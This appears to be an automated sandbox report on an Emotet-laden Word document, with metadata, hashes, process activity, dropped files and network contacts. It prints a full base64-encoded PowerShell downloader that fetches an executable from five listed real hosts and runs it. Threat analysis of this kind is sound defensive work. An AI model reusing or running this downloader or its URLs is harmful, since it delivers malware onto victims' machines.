File name: | jxCitTyH |
Full analysis: | https://app.any.run/tasks/6e74ed8d-aa44-457b-94dd-5cd04a9adb21 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:45:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: XSS, Subject: Enterprise-wide, Author: Julio Quitzon, Keywords: primary, Comments: technologies, Template: Normal.dotm, Last Saved By: Felipa Fadel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 21:31:00 2019, Last Saved Time/Date: Fri Oct 11 21:31:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | 73C3127D7C4AF73231D1302431A80D35 |
SHA1: | 689BE14C748089277D18582EBAF192C5C218CD1A |
SHA256: | A85CC2088EAF316B8FCF3C7F33996B1ACF93F99F820EAA9DFAC83D0637ADC9CE |
SSDEEP: | 6144:ZkPNPAAKUzSRnLx3f4td9pB8LGme764XNNHBly:ZkPNPARUGRt383B8LGL6CNJ/ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | XSS |
---|---|
Subject: | Enterprise-wide |
Author: | Julio Quitzon |
Keywords: | primary |
Comments: | technologies |
Template: | Normal.dotm |
LastModifiedBy: | Felipa Fadel |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:11 20:31:00 |
ModifyDate: | 2019:10:11 20:31:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 173 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Greenfelder Group |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 202 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Cummings |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2572 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\jxCitTyH.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3860 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAGIAMQA0ADcAeAAwADgAMABjADIAPQAnAHgAMgA3ADMAMAA1ADAAMwBjAGIAMAA2ACcAOwAkAGIANQB4ADAAYwA0AGMANgBiADMANAA4ADgAIAA9ACAAJwA4ADUANgAnADsAJABjAGIAMAA1AGMANgA1ADEAMABjADAAMAA3AD0AJwBjADAAMQA4ADMAMAA5AHgAMABjADIAJwA7ACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgA1AHgAMABjADQAYwA2AGIAMwA0ADgAOAArACcALgBlAHgAZQAnADsAJAB4ADMAMAA5ADQAeAAwADkAYwAwAGIAMAA9ACcAYwBjADAAOAAyADYAMAAyAHgAMwAxACcAOwAkAHgAYwAyAGMAMgA5ADUAeAAyADAAOAAwADIAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBMAGkARQBOAFQAOwAkAGIAMAAwAGIAMQAzADcAMQAwADgAMQA9ACcAaAB0AHQAcAA6AC8ALwB4AHMAbgBvAG4AbABpAG4AZQAuAHUAcwAvAGIAbABvAGcAcwAvADQAeAA0ADYANgB2AC8AKgBoAHQAdABwADoALwAvAG8AYgBiAHkAZABlAGUAbQB1AHMAaQBjAC4AYwBvAG0ALwBhAHEAbwBlAGkAdgBqADQAZgBkAC8AdQBzADUAaAB0AHYAbgAvACoAaAB0AHQAcAA6AC8ALwB2AGUAZQBwAGwAYQBuAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABXADAAbwAzAFIAbwBKAE4ARwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGsAbQBhAGMAbwBiAGQALgBjAG8AbQAvAHUAOQByAC8AKgBoAHQAdABwADoALwAvAGEAaQBqAGQAagB5AC4AYwBvAG0ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAAwAC8AJwAuACIAcwBwAEwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAeABjADIAMAAwADAAMQA1ADMAYgA9ACcAYwA3ADgAeABiADgANwA5ADAAMAAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGIAYwAxADYAOAAwADEANAAzADAAYwB4ACAAaQBuACAAJABiADAAMABiADEAMwA3ADEAMAA4ADEAKQB7AHQAcgB5AHsAJAB4AGMAMgBjADIAOQA1AHgAMgAwADgAMAAyAC4AIgBEAG8AdwBOAEwAYABPAEEAZABmAGkAYABMAGUAIgAoACQAYgBjADEANgA4ADAAMQA0ADMAMABjAHgALAAgACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiADkAMwA2ADYAYgAwADAAOAB4ADYAPQAnAGMAMAAzADAAMABjADkAOAAyADcAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAHgAYwAwAHgANQA3AGIAMwA4AGIAMgB4ADcAKQAuACIAbABgAGUAbgBnAFQAaAAiACAALQBnAGUAIAAyADQANQAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAFQAIgAoACQAeABjADAAeAA1ADcAYgAzADgAYgAyAHgANwApADsAJABiAHgAYwAxADAAMAA1ADIANQBjADAANwA0AD0AJwBjADcANgAwADQAMAAwADcAeAB4ADMAMgA4ACcAOwBiAHIAZQBhAGsAOwAkAGIAMgAwADMANwAwADYAMAA5ADQAOQA9ACcAeAB4ADIAMABiADkAMwAwADQAMwBjADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAeABjADUANgAwADAAMwA5ADUAOAB4AHgAPQAnAGMAMAA1ADkAMgAzADQAMAAwADYAYwAwACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA2F1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M2R1NW6S6W1IQNZMIBGE.temp | — | |
MD5:— | SHA256:— | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\314068A8.wmf | wmf | |
MD5:5FD1025D181521CA09BA11EC8B9B3763 | SHA256:6C0C3BC9CB28A4EE5F83A4A24931934EE9CA52A4E865E79681DE89EF16C7FBCE | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6132C40A.wmf | wmf | |
MD5:F2BD45B01BC48C3BD3CB032D0092D5D8 | SHA256:C4B51CD0BF806905DC1993BB263F08B5850AF210883C004474023E9B610E774B | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29EDAC74.wmf | wmf | |
MD5:26AC648AC4001241034B6F17962B2030 | SHA256:F6BE220F89B964E838B049B8BCC34E55D38A52886CAC878DCBC420E0D853D6AC | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5FADCF6.wmf | wmf | |
MD5:6EA092AB08A0B113D41166F15004DADF | SHA256:358642467C3F68BFEFC8294D7479D9B3CFA18680275206C235C348A4F340C990 | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8B378DCC62035BBABEF8B1C2A131A338 | SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275 | |||
3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2572 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62604089.wmf | wmf | |
MD5:0D0D6B24899234D250EEF6812177B5B5 | SHA256:270ED5DD9032A75E248E9D28CA60DDF6A7DFEF7450424520C830AC1CFFD441CD | |||
3860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39ae8a.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3860 | powershell.exe | GET | 404 | 35.184.134.213:80 | http://xsnonline.us/blogs/4x466v/ | US | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 63.250.34.68:80 | http://obbydeemusic.com/aqoeivj4fd/us5htvn/ | US | xml | 345 b | malicious |
3860 | powershell.exe | GET | 404 | 43.229.153.78:80 | http://veeplan.com/wp-content/dW0o3RoJNG/ | HK | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 142.4.50.75:80 | http://www.kmacobd.com/u9r/ | US | xml | 345 b | suspicious |
3860 | powershell.exe | GET | 404 | 101.227.64.237:80 | http://aijdjy.com/dup-installer/t0/ | CN | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3860 | powershell.exe | 63.250.34.68:80 | obbydeemusic.com | Frontline Data Services, Inc | US | unknown |
3860 | powershell.exe | 43.229.153.78:80 | veeplan.com | Hong Kong Telecom Global Data Centre | HK | suspicious |
3860 | powershell.exe | 35.184.134.213:80 | xsnonline.us | Google Inc. | US | suspicious |
3860 | powershell.exe | 101.227.64.237:80 | aijdjy.com | China Telecom (Group) | CN | unknown |
3860 | powershell.exe | 142.4.50.75:80 | www.kmacobd.com | WebNX, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
xsnonline.us |
| suspicious |
obbydeemusic.com |
| malicious |
veeplan.com |
| suspicious |
www.kmacobd.com |
| suspicious |
aijdjy.com |
| unknown |